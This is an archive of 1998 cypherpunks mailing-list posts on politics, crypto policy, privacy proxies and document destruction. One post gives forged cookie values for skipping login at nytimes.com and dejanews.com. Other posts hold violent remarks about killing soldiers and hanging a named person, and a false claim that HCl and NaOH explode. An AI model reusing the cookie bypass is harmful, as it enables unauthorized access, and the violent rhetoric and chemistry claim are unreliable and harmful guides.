Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0195.myriad.ml.org (Matthew Ghio)
Date: Sun, 25 Jan 1998 02:54:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
In-Reply-To: <199801230425.FAA19403@basement.replay.com>
Message-ID: <199801241849.NAA17756@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> [1] Grab a totally random sample of 100 high school students. Haul the
>     students out one at a time and ask them the following questions:
[snip]
> 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
>     circumstances, what is produced and in what quantities?
> 

The correct answer is an explosion and a big mess.  One student in my high
school chemistry class learned this the hard way.  :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Sun, 25 Jan 1998 03:41:26 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Sucking Sound...
In-Reply-To: <3.0.3.32.19980123083544.006a9088@popd.netcruiser>
Message-ID: <v03007805b0eff02a772c@[204.254.22.58]>
MIME-Version: 1.0
Content-Type: text/plain



Tim is right to bring this up. It will have immense impact on the issues
the cypherpunks care about. How can Clinton talk about policy proposals
(crypto, Net-taxes, etc.) when his presidency is spiraling away?

At the daily press briefing yesterday, McCurry tried to talk about some
welfare plan or something. Whatever. Doesn't matter what it was; I don't
remember -- point is you don't see it on the front page of newspapers today.

Note the grand jury is set to meet next Tues, not coincidentally, the day
of the SoUA. A week ago everyone was scrambling to find out what was going
to be in it. Nobody cares anymore. I may sit in on it in the press gallery
just to see the dynamic and hear the catcalls.

Where I work, most of the folks are liberals. Before this week, they lent
scant credence to Paula Jones etc. -- the previous Bimbo Eruptions. This
time is different. This time there is serious talk of impeachment: what the
legal standards are, what the Republicans are doing on the Hill, what this
means for Gore.

This time, it's for real.

-Declan



At 18:30 -0800 1/23/98, Tim May wrote:
>At 8:35 AM -0800 1/23/98, Jonathan Wienke wrote:
>
>>Has anyone else heard a "giant sucking sound" from the vicinity of the
>>White House lately?
>
>If that was an intentional pun, a good one.
>
>But I had been marveling at how the Clinton troubles were being ignored by
>the Cypherpunks...I figured we were all so jaded about government and the
>criminals who flourish in Washington that there was no point in commenting
>on this latest revelation of corruption. (The apparent perjury, suborning
>perjury, and witness-tampering, not the affair with Lewinsky, however
>tawdry it was.)
>
>It would have been interesting to see the whole process leading up to
>Clinton's resignation (next week?) pass without any discussion by us.
>
>(Actually, I threw in an aside yesterday about "President Gore," but no one
>picked up on it.)
>
>Personally, I think having a crippled and ineffective President is better
>than having an activist bozo President Gore, so I'm kind of hoping this
>whole affairs takes several more months to unwind.
>
>--Tim May
>
>
>
>The Feds have shown their hand: they want a ban on domestic cryptography
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^2,976,221   | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0197.myriad.ml.org (Matthew Ghio)
Date: Sun, 25 Jan 1998 04:14:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <199801240418.FAA17881@basement.replay.com>
Message-ID: <199801242006.PAA20035@myriad>
MIME-Version: 1.0
Content-Type: text/plain



ratbert at nym dot alias dot net wrote:

> Junkbusters (http://www.junkbusters.com/) offers a personal proxy server
> kind of thing that lets you mash just about everything: HTTP headers, user
> agent info, referer URL, cookies, etc. It runs on either NT or Unix

Yep, I've got it running on www.myriad.ml.org:8000.  It works great - the
only site I've had problems with so far is nytimes (it tries to set a
cookie when you log in as cypherpunks/cypherpunks)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 25 Jan 1998 05:19:44 +0800
To: cypherpunks@toad.com
Subject: Re: Sucking Sound...
Message-ID: <1.5.4.32.19980124211026.006f720c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



No, it's the public and press, not the President, who are into 
denial about the nation's urgent succor. The President's radio
address today was solely on Medicare fraud and abuse.

http://www.whitehouse.gov/WH/html/1998-01-24.html

Lucianne Goldberg's place is down the street and mobbed
around the clock with global bloodsuckers. "There is a god,"
she says, noting fruitless years of the right trying its best to 
suckerpunch the toke-sucker.

Which leads one to wonder who's squeeze gave what to 
Freeh's on Reno's, Starr's on Freeh's, Reno's on Starr's, 
that led them to gang up to divert attention to Bill's. Must have 
been Hillary's, aiming to succotash Al's.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Sun, 25 Jan 1998 00:51:30 +0800
To: coderpunks@toad.com
Subject: Re: cryptix java AES effort
Message-ID: <34CA1B3D.7D1181D1@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam kindly forwarded the AES quest blurbs to interested and/or
interesting groups.  Some slight clarification is required in the detail
of who and what.

Adam said:
> Systemics provides a BSD licensed (free for commercial and
> non-commercial use) java crypto library called cryptix.

A slight modification:   Systemics provided, in the past tense.

It was always the belief of those at Systemics at the time that selling
crypto was extremely hard without contacts into big companies (in which
case, you weren't selling crypto...).  When Cryptix stabilised it was
published as freeware with a BSD-style of license, with the hope that
other people would pick it up and start to work with it.

With the Java library this has happened.  There is now a team of between
4 and 10 people,  depending on how you count them, scattered across the
globe, improving the core Cryptix code.  Over the last year or so, we
codified the notion of the independant group working around the library
as the Cryptix Development Team.  That is now spreading through the
doco.

( There are a few issues such as copyright and the brand name, which are
beyond the scope of   this email.  Whilst Systemics is not entirely
passive in this area, it does not sell Cryptix code, although it might,
and does, sell services such as improving Cryptix code.  Also, those who
work/have worked at Systemics are also part of the team. )



The AES quest is a Cryptix operation.  I.e., Cryptix Development Team,
and not Systemics.  It is a completely unfunded (although sponsorship
would be appreciated) and volunteer effort.  Whilst the NIST people earn
a salary, and most of the cryptographers are employed in this capacity
as well, there is no especial interest in employing programmers here, as
any rational company will simply wait until the winner is announced,
sometime in the next millenium, and then employ an expert at $300 per
hour to tell them all about it.

Rationally or otherwise, we still need programmers to code up the
algorithms and prepare them for submission to NIST.  For many
cryptographers, it is beyond their efficient capabilities to know much
about the downstream discipline, so it makes sense for them to outsource
the work to a team like Cryptix, especially as NIST has loaded up the
submission requirements with 3 separate implementations.

If you're thinking now's the time to branch into Java crypto, read the
blurb and mail us.  The rational part is that if you start now, you
might be earning fat fees in a few years time.

>   http://www.cs.ucl.ac.uk/staff/I.Brown/cryptix/aes/AES_crypt.html
>   http://www.cs.ucl.ac.uk/staff/I.Brown/cryptix/aes/AES_prog.html

-- 
iang                                      systemics.com

FP: 1189 4417 F202 5DBD  5DF3 4FCD 3685 FDDE on pgp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@gl.umbc.edu>
Date: Sun, 25 Jan 1998 06:10:48 +0800
To: Crypto UMBC <crypto@lists.umbc.edu>
Subject: Barry Smith (FBI) to speak 3:30pm Friday, March 6 at UMBC
Message-ID: <Pine.SGI.3.91.980124165113.2310C-100000@pomeranian.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain



The wwe page for Barry Smith's talk 
on encryption policy is now up:

http://www.cs.umbc.edu/events
then navigate to /spring98/crypto2.shtml

Interested parties are encouraged to submit
questions via email to sherman@cs.umbc.edu
All questions are posted on the www page.

See this page for details on a $50 www contest for the best
question-gathering www engine.  Contestants who are UMBC students
may apply for CGI priviledges from Jack Suess (UCS), 
jack@cs.umbc.edu    (For professional www programmers,
this contest should be viewed as a request for volunteers
to support UMBC's crypto seminar series.)

Dr. Alan T. Sherman
Associate Professor, Computer Science
sherman@cs.umbc.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: guest_mail@online.disney.com
Date: Sun, 25 Jan 1998 11:27:15 +0800
To: <cypherpunks@Algebra.COM>
Subject: Thank you for registering at Disney.com
Message-ID: <34ca9bfc3e7d002@piglet-136.disneyblast.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome, and thank you for registering at Disney.com, the best place
to find out what's new at Disney!  From now on, all you'll need to 
enter our contests and sweepstakes are your parent or guardian's 
permission -- and your Disney.com Registration Name and Password.  
We suggest you make a note of these names so you don't forget them.
If you do forget them, you can use your special, easy-to-remember 
Disney.com "code word" to find them again.

Just to make sure our records are correct, please take a look at the
information you gave us:

     Your first name:                cypherpunks
     Your last name:                 cypherpunks
     Your e-mail address:            cypherpunks@algebra.com
     Your parent's e-mail address:   cypherpunks@algebra.com
     The year of your birth:         1990
     Your Registration Name:         cypherpunks

We're sending your parent or guardian an e-mail message just to let
them know you've registered with us.  Any prizes you win at
Disney.com will be awarded to them on your behalf, so they should
know you registered.

There's a whole world of Disney at your fingertips, so have fun!

        -- Your friends at Disney.com


(c) Disney






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: guest_mail@online.disney.com
Date: Sun, 25 Jan 1998 11:28:22 +0800
To: <cypherpunks@Algebra.COM>
Subject: Disney.com Registration Notification
Message-ID: <34ca9bfc3e7c002@piglet-136.disneyblast.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Parent --
     
We at Disney.com wanted to let you know that a guest has registered 
at our Web site as your child.  We welcome guests of all ages, and 
it is our policy to let parents and guardians know when children 
under 16 send us personal information. 
     
This message is only a confirmation -- it does not require a reply 
if you grant your child permission to be registered at Disney.com.  
If you'd like to cancel that Registration, please see the 
instructions below. 
     
Here's what we received when your child registered:
     
     Your child's first name:              cypherpunks
     Your child's last name:               cypherpunks
     Child's e-mail address:               cypherpunks@algebra.com
     Parent's e-mail address:              cypherpunks@algebra.com
     Your child's year of birth:           1990
     Child's Disney.com Registration Name: cypherpunks
     
You might want to ask what your child's Password is and make a note 
of it.  If you or your child lose or forget the Disney.com 
Registration Name and/or Password, you can retrieve them using the 
special, easy-to-remember "code word" your child also selected 
upon registering.  If your child wins prizes at Disney.com, you will 
receive them on his or her behalf.  
     
If you'd like to cancel your child's Disney.com Registration, please
follow these simple steps:
     
1. Click the "Reply" button on your e-mail application.
2. Make sure your reply contains the text of this message (including
   your child's name, e-mail address, and Registration Name).
3. Type "Unsubscribe my child" in the "Subject" area at the top of 
   your message, and send the message back to us.  That's it!
     
We welcome you and your child to Disney.com, the best place to find 
out what's new from Disney!
     
        -- Your friends at Disney.com
     
     
     
     
(c) Disney





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 25 Jan 1998 07:54:49 +0800
To: freedom-knights@jetcafe.org
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <199801242006.PAA20035@myriad>
Message-ID: <ei4TJe50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



ghio@temp0197.myriad.ml.org (Matthew Ghio) writes:

> ratbert at nym dot alias dot net wrote:
>
> > Junkbusters (http://www.junkbusters.com/) offers a personal proxy server
> > kind of thing that lets you mash just about everything: HTTP headers, user
> > agent info, referer URL, cookies, etc. It runs on either NT or Unix
>
> Yep, I've got it running on www.myriad.ml.org:8000.  It works great - the
> only site I've had problems with so far is nytimes (it tries to set a
> cookie when you log in as cypherpunks/cypherpunks)

Junkbusters works very nicely for me. I highly recommend it.

A warning about cookies: no proxy server I know can
stop the server from trying to set the cookie by

a) putting a <META HTTP-EQUIV="Cookie:" CONTENT="foo=bar;expires...">
in the header;

b) if you have JavaScript enabled (not a good idea), running something like
<SCRIPT SCRIPT TYPE="text/javascript"><!--
document.cookie="foo=bar;expires=Sunday, 04-Jul-2010 00:00:00 GMT;path=/";//--></SCRIPT>

You need to tell the browser to turn off the cookies even if you have
an anti-cookie prixy server.


Cookies and the NYTIMES subscription: NYTIMES.COM tries to store your
userid and password in the cookie with keywords PW= and ID=. Problem is,
it tries to encode them using 8-bit characters. Lucky for us, at this time
NYTIMES.COM does not check if userid/password are valid, just that they're
a part of the cookie!! So, just add these two lines to your junkbuster config:

wafer PW=0
wafer ID=0

and nytimes.com will greet you as "0" and let you right in.

Sure junkbuster feeds every wafer to every server, but I don't care.

If you really want to send "cypherpunks", replace both 0s by the character
representation of the hex string a1252e36392c2e2930332bdf. I'm not even
trying to mail it verbatim because I know it would get mangled.


Another site that uses weakly encrypted cookies is DEJANEWS.COM.
For them, I've added these two lines to junkbuster config:

wafer GTUID=03.35644.0.0.1145.00000
wafer DNUID=02717fb0f47d3544510927a15805ab3640987332e4ed6e58e78660744bc8320d260963691c27f34ef4b292e93258a7c7a6ea6b78200c6ade8f378833d6d5

This lets you post as cypherpunks@anonymous.crypto.conspirators.int and if and
when dejanews locks it out, drop me a line and I'll cook up another one. :-)

(Warning: when you post to usenet via dejanews, it adds your ip address
to the header; use a proxy.)

Hang Chris Lewis by his empty scrotum (he has no balls, or we'd hang him
by his balls)!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <bm194@scn.org>
Date: Sun, 25 Jan 1998 10:34:37 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SUN.3.96.980124182641.12768A-100000@scn>
MIME-Version: 1.0
Content-Type: text/plain



rz
**





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 25 Jan 1998 07:58:10 +0800
To: cypherpunks@toad.com
Subject: Re: Clinton needs a war with Iraq
In-Reply-To: <v03102800b0f007a3850a@[207.167.93.63]>
Message-ID: <Fs5TJe51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> There are increasing reports, from Washington and Baghdad, that Clinton
> wants a nice little war action in Iraq, which would have the side effect of
> boosting his support...or so he hopes.
>
> If this happens, it may be time for hackers to use technical means to
> disrupt the war effort.

I'm with you, Commander Timmy.  What can I do do get some American aggressors
killed?

Hands off Iraq!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 25 Jan 1998 02:50:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
In-Reply-To: <199801230425.FAA19403@basement.replay.com>
Message-ID: <199801241845.TAA28206@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> 7) What are the following government agencies and what are their function?
>     a) FCC

They censor TV and tax your telephone

>     b) NSA

They read your private e-mail and censor crypto publications

>     c) CIA

They run drugs in South America

>     d) FBI

They wiretap your telephone 

>     e) DEA

They shoot at the drug runners

>     f) BATF

They burn down churches

>     g) NTSB

They blow up airplanes and blame it on 'terrorists'

>     h) DOJ

They harass Microsoft





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <foggy@gilligan.netisle.net>
Date: Sun, 25 Jan 1998 13:08:34 +0800
To: cypherpunks@toad.com
Subject: Uncle Sam's Sticky Fingers
Message-ID: <Pine.LNX.3.95.980124210109.1183B-100000@gilligan.netisle.net>
MIME-Version: 1.0
Content-Type: text/plain



For a general run-down on just how much of your privacy the Feds have
access to, take a look at the GAO's Investigator's Guide to Sources of
Information (http://www.gao.gov). It's under 'Special Publications and
Software'.

Photocopies of any postal money orders you've bought? Your Amtrak train
reservation history? Uncle Sam's got sticky fingers baby! He doesn't
throw anything away.

-----------------------------------------------------------------
foggy@netisle.net                  lat:47d36'32" long:122d20'12"
"Rather perish than hate and fear, and twice rather perish than
make oneself hated and feared."                    -F. Nietzche-
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 25 Jan 1998 04:09:18 +0800
To: cypherpunks@cyberpass.net
Subject: NoneRe: How to eliminate liability?
In-Reply-To: <19980123052334.20406.qmail@hotmail.com>
Message-ID: <199801242003.VAA07620@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



John M wrote:

> Well, what about spreading the information out?  Something simple like
> doing a matrix rotation on the scrambled data in 8 byte blocks and
> splice it by bit to split the data up, add ECC (error correction code)
> to it, and spread it to several servers.  This way no one server has all
> the information necessary to recreate the "offending" information and if
> one server gets "hit" (killed), the information can still be regenerated
> from the the information and ECC from the other servers.


This seems like another variation of the 'reverse secret-sharing' schemes,
independently proposed by Jim McCoy, Matt Ghio, and others.

Cooper and Birman give a good theoretical introduction at
http://cs-tr.cs.cornell.edu/TR/CORNELLCS:TR95-1490
although their scheme uses only the simple XOR instead of a full matrix.

Ghio's version is at
http://infinity.nus.sg/cypherpunks/dir.archive-97.06.12-97.06.18/0391.html

Neither paper goes heavily into linear algebra, but the scheme can easily
be extended to martices in a finite field, xor being the special case of
mod 2.

The idea's been around for awhile; it'd be nice to see a working
implementation (hint, hint).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 25 Jan 1998 13:32:16 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Executing Kaczynski
In-Reply-To: <v03102800b0efc2f9809e@[207.167.93.63]>
Message-ID: <199801250527.VAA28005@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




[TCM]
>
>BTW, Kaczynski is apparently no crazier that any number of Cypherpunks I
>have met, including myself.

hee, hee.

> Recall that a leading Cypherpunk was suspected
>for a while as being the Unabomber.

whoa, are you being facetious here or what? would you care to elaborate
on that little tidbit?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 25 Jan 1998 04:44:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Document destruction services (fwd)
In-Reply-To: <199801241720.LAA19990@einstein.ssz.com>
Message-ID: <199801242038.VAA11594@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:

> Can one buy concentrated sulfuric acid in this country without being
> stormed by jackbooted thugs? I think that I'll need a couple of gallons.
> To that I'll need about teh same amount of chalk-like material to
> neutralize it after the deed is done.

I'd use NaOH instead - after you're done, just leave it sit out, and it
will neutralize itself by absorbing carbon dioxide from the atmosphere,
dissolving the ink into little crystal structures which look kinda pretty...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 25 Jan 1998 05:57:53 +0800
To: "Igor Chudov @ home" <ichudov@Algebra.COM>
Subject: Re: Document destruction services
In-Reply-To: <199801241709.LAA04622@manifold.algebra.com>
Message-ID: <Pine.BSF.3.96.980124225245.19078B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



There are companies that will shred  an entire box. In your presence. Box
goes  in on one side (cardboard and all), little pieces come out the other
side. Check the yellow pages.


On Sat, 24 Jan 1998, Igor Chudov @ home wrote:

> Tim May wrote:
> > >I have a box of confidential papers that I do not need. I would prefer not
> > >to just throw them away, but to either shred or incinerate them. Due to
> > >the sheer size of the box, it is not practical for me to buy and use a home
> > >shredder. Would anyone have a suggestion as to what is the best way to
> > >destroy them? Aer there any services that do it inexpensively?
> > 
> > Just burn them, either in a fireplace, since it's winter, or in a 55-gallon
> > drum.
> 
> This kind of paper does not burn very well. I have tried it. Burning it
> in my fireplace will take forever. A drum is an option though.
> 
> 	- Igor.
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 25 Jan 1998 06:08:38 +0800
To: Declan McCullagh <declan@pathfinder.com>
Subject: Re: Sucking Sound...
In-Reply-To: <v03007805b0eff02a772c@[204.254.22.58]>
Message-ID: <Pine.BSF.3.96.980124225732.19078C-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 24 Jan 1998, Declan McCullagh wrote:
> Note the grand jury is set to meet next Tues, not coincidentally, the day
> of the SoUA. A week ago everyone was scrambling to find out what was going
> to be in it. Nobody cares anymore. I may sit in on it in the press gallery
> just to see the dynamic and hear the catcalls.

If there is one day I'd stay away from that building it is during the
SoUA...

:-)
-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Sun, 25 Jan 1998 08:47:31 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Poll shows Bill G. popular & MS monopoly supported [CNN]
Message-ID: <5c8b57e84241dd042e19c4e4e4801dca@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>Bill -- you *believed* this?  :-)

Why not? The morons can't even write HTML, even *with* the help of some
"HTML authoring kit." If they could we wouldn't be greeted with image maps,
unnamed links, unnamed inline images every 5 words, frames, broken CGI
scripts...

So I, at least, wouldn't find it surprising. The sheeple are blind, naked,
and shit stupid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Sun, 25 Jan 1998 13:23:21 +0800
To: "Attila T. Hun" <attila@hun.org>
Subject: Re: attila & maureen on Bubba
In-Reply-To: <19980125.033137.attila@hun.org>
Message-ID: <v0300780ab0f079dcda66@[204.254.22.58]>
MIME-Version: 1.0
Content-Type: text/plain



At 03:50 +0000 1/25/98, Attila T. Hun wrote:
><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

>          the Democratic power bosses who were against him in the
>          primaries would have done more evaluation of his bimbo
>          patrol mentality before they committed. <p>
>

Good rant, and a surprisingly good one by Maureen. But it's wrong to say
that the Dem power bosses were against Clinton in the primaries. I worked
for Jerry Brown's campaign staff in '92 and can testify that they were
lined up in Clinton's camp ever since his tenure at the DLC.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Sat, 24 Jan 1998 19:23:02 +0800
To: cryptography@c2.net
Subject: Update on New Zealand crypto policy
Message-ID: <88564079931716@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain




As part of my recent effort to prepare a useful home page after 2 years of 
having instead a mini text adventure, I've finally got around to finishing off 
the web page containing the recent history of, and current state of, New 
Zealands crypto export policy as decided by several intelligence agencies and 
a supporting cast of bungling bureaucrats.  This policy has resulted in New 
Zealand enjoying the dubious distinction of having the strictest export 
controls on earth, with everything ranging from crypto hardware down to 
software, library books, computer magazines, and journals being restricted 
from export.  It's not even possible for a university to publish academic 
research without prior permission from a government agency, and the 
requirements for obtaining this permission are structured to ensure that they 
can never be fulfilled.  You can find the information on:
 
  http://www.cs.auckland.ac.nz/~pgut001/policy/
 
The page also contains links to a sizeable collection of never-before- 
published documents including correspondence with relevant government 
agencies, and media reports on the situation.
 
If you're going to send me mail about this, please note that I'll be at Usenix 
in San Antonio for the next week, so it'll take awhile for me to reply.  My 
PGP key's at the bottom of my home page if you need it.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sun, 25 Jan 1998 20:55:28 +0800
To: Tim May <cypherpunks@Algebra.COM
Subject: Re: Clinton needs a war with Iraq
In-Reply-To: <v03102800b0f007a3850a@[207.167.93.63]>
Message-ID: <3.0.3.32.19980125034213.006c389c@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 01:06 PM 1/24/98 -0800, Tim May wrote:
>
>There are increasing reports, from Washington and Baghdad, that Clinton
>wants a nice little war action in Iraq, which would have the side effect
of
>boosting his support...or so he hopes.

Can you say "Wag The Dog," boys & girls?
-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNMslFMJF0kXqpw3MEQKZHQCgpVfszPqVjIr04ViTQb5WNMyMEiMAoIqA
vOfsUOAs2wgjgCmo39lbx/cf
=GM7f
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Sun, 25 Jan 1998 12:00:12 +0800
To: cypherpunks <attila@primenet.com>
Subject: attila & maureen on Bubba
Message-ID: <19980125.033137.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html><head>
            <title> Attila &amp; Maureen on Clinton </title>
    <META name="Author" content="Attila T. Hun &amp; Maureed Dowd">
    <META name="Generator" CONTENT="by Attila's hand">
    <META name="KeyWords" CONTENT="Clinton,Maureen,Dowd,oral,sex,scandal"> 
    <META Name="Description" CONTENT="Comment on Maureen's comments on Clinton Oval Office Sex Scandal">
    <META HTTP-EQUIV="Reply-to" CONTENT="attila@hun.org">
    <META http-equiv="PICS-Label" content='(PICS-1.1
        "http://www.classify.org/safesurf/" l 
        by "attila@hun.org" r (SS~~000 3))'>
</head> <body border=0 bgcolor="f0f0e0"
    text="black" link="blue" vlink="purple" alink="purple">
<a name="top"></a>
<center> <table width=800 align=center valign=top cols=5>
  <tr height=5>
    <td bgcolor="f0f0e0" align=center valign=middle width=10> &nbsp; </td>
    <td bgcolor="f0f0a0" align=center valign=middle width=5> &nbsp; </td>
    <td align=left valign=middle> &nbsp; </td>
    <td bgcolor="f0f0a0" align=center valign=middle width=5> &nbsp; </td>
    <td bgcolor="f0f0e0" align=center valign=middle width=10> &nbsp; </td>
  </tr>
  <tr>
    <td bgcolor="f0f0e0" align=center valign=middle width=10> &nbsp; </td>
    <td bgcolor="f0f0a0" align=center valign=middle width=5> &nbsp; </td>
    <td align=left valign=top>

      <center><font size=5 color=700000><b>
          Clinton's Achilles' Heel
              </b></font></center>
      
      <blockquote>
          well, this may finally do it for Clinton.  if he was not so
          stupid, he would pack out of white house in the middle of
          the night, pick up his ill-gotten gains from Switzerland, or
          wherever he has them stashed, and disappear into the night
          --but, no, he might be forced to settle for Hillary-- which
          would be revenge served up cold --they deserve each other. <p>
      
          if the Asian crisis was not in full rage, and the US market
          shaky with worry, we could afford to dump Clinton in the
          dumpster --unfortunately, the spectacle of an American President
          actually being successfully impeached will probably blow the
          American and European markets right out of the water --and
          the American economy with it --that just might be Clinton's
          lasting legacy. he may deserve that footnote in history, but 
          the rest of us certainly do not. <p>
      
          the NWO powers behind our "throne" may have needed a patsy
          after their main man became unelectable, but they certainly
          could have done better than bubba. you'd think they, or even
          the Democratic power bosses who were against him in the 
          primaries would have done more evaluation of his bimbo
          patrol mentality before they committed. <p>
      
          even I was a little skeptical of the "allegations" in
          the book "Primary Colors" (particularly to the Hillary 
          affair) and I have been more than a little skeptical of
          the revelations of the "slave" courier/purveyors who have
          surfaced, but there may be more fire than smoke. it was
          certainly understandable why Joe Kline wrote the book as
          "Anonymous" --he must have been a cypherpunk-- or at least
          he should also have been using our anonymous remailers and
          nontracable digital cash. <p>
      
          God save us from Al Bore.  he needed to have a Spiro Agnew
          in his future, but Janet Reno saved his skin.  he is a
          decent sort, but I just can not handle the left-leaning
          socialist son-of-a-bitch with his sanctimonious looks --he
          needs a circuit riding preacher's floppy hat and a mule-- 
          even if he did go to Harvard. <p>
      
          on the other hand, if Al Bore goes down, and they can not
          agree on a vice-president before Clinton either bales or is
          smoked out, we would have Newt --that might have been
          acceptable, except I think Newt either sold out or has been
          intimidated. <p>

                <b>&nbsp;&nbsp;&nbsp;<a href="mailto:attila@hun.org">
 
            attila out for the count.... 
                                            </b></a></blockquote>
      
      January 25, 1998 <br>
      NYTimes OpEd Columnist <br>
      LIBERTIES / By MAUREEN DOWD <br><b>
      Not Suitable for Children </b><p>
      
      WASHINGTON -- There have been so many people rushing
      to TV studios in this giddy and cataclysmic week to
      talk about sex that networks are bringing makeup
      artists out of retirement. <p>
      
      The palaver about whether a 21-year-old White House
      intern had a particular kind of sex with the President
      has gotten so graphic that CNN's "Inside Politics"
      Friday featured a warning that the segment might not
      be suitable for young viewers. <p>
      
      Let's review what we've learned so far. <p>
      
      The President a liar?  <i> Knew that. </i><p>
      
      The President a philanderer?  <i> Knew that. </i><p>
      
      The President reckless in the satisfaction of his
      appetites?  <i> Knew that. </i><p>
      
      The President would say anything and hurt anybody to
      get out of a mess?  <i> Knew that. </i><p>
      
      Married men cheat?  <i> Knew that. </i><p>
      
      Married men cheat with young women?  <i> Knew that. </i><p>
      
      Married men who cheat with young women lie about it?
      <i> Knew that. </i><p>
      
      Hillary isn't throwing Bill's stuff out on the White
      House lawn because she is as committed to their
      repugnant arrangement as he is?  <i> Knew that. </i><p>
      
      The Clinton team -- those great feminists -- devising
      ways to discredit women who come forward with reports
      of Clinton peccadilloes?  <i> Knew that. </i><p>
      
      The President and his minions dissembling and
      splitting hairs and playing semantic games and taking
      forever to find the documents until our attention
      wanders?  <i> Knew that. </i><p>
      
      The President has the moxie to pick out a dress for a
      woman?  <i> Didn't know that. </i><p>
      
